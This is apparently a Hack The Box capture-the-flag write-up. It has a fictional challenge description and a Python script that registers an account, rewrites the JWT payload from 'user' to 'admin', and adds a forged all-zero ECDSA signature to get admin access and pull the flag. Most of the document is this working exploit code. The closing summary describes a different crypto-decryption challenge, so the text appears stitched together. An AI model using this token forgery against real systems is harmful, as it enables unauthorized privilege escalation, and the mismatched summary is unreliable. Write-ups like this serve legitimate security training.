https://app.hackthebox.com/challenges/789

Description

E Corp’s control hinges on their ability to manipulate and monitor the population. A crucial system has been infiltrated, and it contains vital information about the EverLast chemical. As a member of the immune group, your mission is to gain administrator privileges within the system and access confidential secrets. The system’s defenses appear robust, but we believe there’s a vulnerability waiting to be exploited due to their outdated infrastructure. Discover the hidden truths and help us dismantle their control over society. The future of our freedom rests in your hands.

Exploitation

#!/usr/bin/python3
import re,sys,requests
from base64 import b64encode, b64decode

def get_base_url():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    return f"http://{sys.argv[1]}/"

URL = get_base_url()

def craft_admin_token(jwt):
    header, payload, _ = jwt.split('.')
    new_payload = b64encode(b64decode(payload.encode()).replace(b'user', b'admin')).decode()
    return f"{header}.{new_payload}.MAYCAQACAQA"

def jwt_user():
    headers = {
        "Host": sys.argv[1],
        "Content-Type": "application/x-www-form-urlencoded"
    }
    requests.post(f'{URL}/register', headers=headers, data="username=htb_user&password=htb_user&email=user@htb.eu")
    response = requests.post(f'{URL}/login', headers=headers, data="username=htb_user&password=htb_user")
    if response.status_code != 200:
        print(f"Error during login: {response.text}")
        sys.exit(1)
    token = response.cookies.get('token')
    if not token:
        print("Error: JWT token not found in cookies")
        sys.exit(1)
    return token

def send_admin_token(token):
    response = requests.get(f'{URL}/list', cookies={'token': token})
    match = re.search(r'HTB\{.*?\}', response.text)
    return match.group(0) if match else "Flag not found"

if __name__ == '__main__':
    admin_token = craft_admin_token(jwt_user())
    flag = send_admin_token(admin_token)
    print(flag)

Summary

Read Before You Sign: model the crypto leak, recover the missing secret, and decrypt the flag.